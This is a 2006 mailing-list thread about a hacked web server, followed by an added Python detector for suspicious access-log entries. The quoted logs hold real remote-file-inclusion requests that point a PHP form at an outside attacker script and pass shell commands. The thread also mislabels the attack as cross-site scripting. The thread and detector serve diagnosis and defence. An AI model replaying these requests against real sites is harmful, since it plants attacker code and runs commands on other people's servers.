Re: Postfix hit again (Spam)



On Tue, 23 May 2006 16:39:20 +0100 Paul Howarth <paul@xxxxxxxxxxxx> wrote:

On Tue, 2006-05-23 at 11:25 -0400, CodeHeads wrote:
On Tue, 23 May 2006 08:45:30 +0100 Paul Howarth <paul@xxxxxxxxxxxx> wrote:

On Mon, 2006-05-22 at 23:11 -0400, CodeHeads wrote:
On Tue, 23 May 2006 00:14:32 +0000
replies-lists-redhat@xxxxxxxxxxxxxxxxxxxxx wrote:
I haven't been following this topic in great detail, but I suspect
that you have a form on your site that is being exploited for "form
spam". If you're not familiar with this, search Google for "form
spam".

- Rick


Rick,
Thank you. No, I have not heard of this.

I don't think that's what this is. Form spam takes advantage of
poorly-coded mail/contact forms and uses them to send mail to recipients
other than those intended by the form designer.

What's happening here is that the spammer is running their own code
(downloaded into /tmp) to send the mail, a rather more serious
situation.

Paul.

I might not know too much but I really think they are using my forms. I
found quite a few log entries. Here are a few.
81.199.173.8 - - [22/May/2006:18:57:51 -0400] "POST /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://www.tiffefermaintfashion.com/gbook/tmp/xzblog.txt? HTTP/1.0" 200 5923

AOL:
172.179.33.217 - - [21/May/2006:07:58:01 -0400] "GET /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=id HTTP/1.1" 200 2374
172.179.33.217 - - [21/May/2006:07:58:20 -0400] "GET /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=w HTTP/1.1" 200 2412
172.179.33.217 - - [21/May/2006:07:58:34 -0400] "GET /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=cd%20/var/tmp HTTP/1.1" 200 2323

And the xpl.netmisphere2.com site has hacking information:
http://xpl.netmisphere2.com/ I think this ought to be illegal!!

Looks like an exploit of a cross-site scripting vulnerability in your
join.php form. http://xpl.netmisphere2.com/CMD.gif is the cracker's PHP
script that gets injected into your form; it's not an image at all.

You need to turn off that form until you can get a fixed version of that
application. And of course reinstall that system.

Paul.


Thanks, Paul. That is what I thought. I am writing my own topsites anyway, so
that is no big deal. I will be deleting the other one.

--
fedora-list mailing list
fedora-list@xxxxxxxxxx
To unsubscribe: https://www.redhat.com/mailman/listinfo/fedora-list
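
Added example, not part of the original thread: a Python check for the pattern visible in the access-log excerpts above, a query parameter whose decoded value is an http:// URL (ftp:// is included as a generalization beyond what the thread shows). The sample lines, client addresses and host.example.invalid are constructed, and find_remote_includes is a hypothetical name.

```python
import re
from urllib.parse import parse_qsl

# Apache common log format: host ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# A parameter value that is itself a remote URL (checked after percent-decoding).
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def find_remote_includes(lines):
    """Return (client, status, path, param, value) for each URL-valued parameter."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line; skip rather than guess
        path, _, query = m["target"].partition("?")
        # parse_qsl percent-decodes names and values, so CONFIG%5bpath%5d
        # becomes CONFIG[path] and http%3A%2F%2F becomes http://
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_RE.match(value):
                # Status 200 only means the script answered, not that the
                # include worked; treat every hit as needing investigation.
                hits.append((m["host"], m["status"], path, name, value))
    return hits

# Constructed sample lines modelled on the excerpts in the thread.
SAMPLE = [
    '192.0.2.10 - - [21/May/2006:07:58:01 -0400] "GET /topsites/sources/join.php'
    '?FORM%5burl%5d=x&CONFIG%5bpath%5d=http://host.example.invalid/CMD.gif?&cmd=id'
    ' HTTP/1.1" 200 2374',
    '192.0.2.10 - - [21/May/2006:07:59:10 -0400] "GET /topsites/index.php?page=2'
    ' HTTP/1.1" 200 8120',
    '198.51.100.7 - - [22/May/2006:18:57:51 -0400] "POST /topsites/sources/join.php'
    '?CONFIG%5bpath%5d=http%3A%2F%2Fhost.example.invalid%2Fx.txt%3F HTTP/1.0" 200 5923',
    '198.51.100.7 - - [22/May/2006:19:02:00 -0400] "GET /search.php?q=http+proxy+setup'
    ' HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for client, status, path, param, value in find_remote_includes(SAMPLE):
        print(f"{client} {status} {path} {param}={value}")
```

Parameters that legitimately carry URLs (redirect targets, link-submission fields) will also match, so review hits per script rather than blocking on the pattern alone.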


